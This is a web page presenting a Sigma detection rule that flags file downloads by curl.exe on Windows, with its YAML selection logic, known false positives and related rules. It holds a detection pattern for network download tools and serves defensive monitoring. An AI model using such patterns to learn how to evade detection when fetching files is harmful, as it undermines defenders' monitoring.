File Download Via Curl.EXE
Detects file download using curl.exe
Convert In Phoenix Studio
Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.
Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.
detection:
selection_img:
- Image|endswith: '\curl.exe'
- Product: 'The curl executable'
selection_remote:
CommandLine|contains:
- ' -O' # covers the alias for --remote-name and --output
- '--remote-name'
- '--output'
condition: all of selection_*Scripts created by developers and admins
Administrative activity
The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt "
Tactics
Techniques
Other
Curl.EXE Execution
Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server
This rule was derived from the related rule - both detect similar activity with different scope.
Suspicious Curl.EXE Download
Detects a suspicious curl process start on Windows and outputs the requested document to a local file
This rule was derived from the related rule - both detect similar activity with different scope.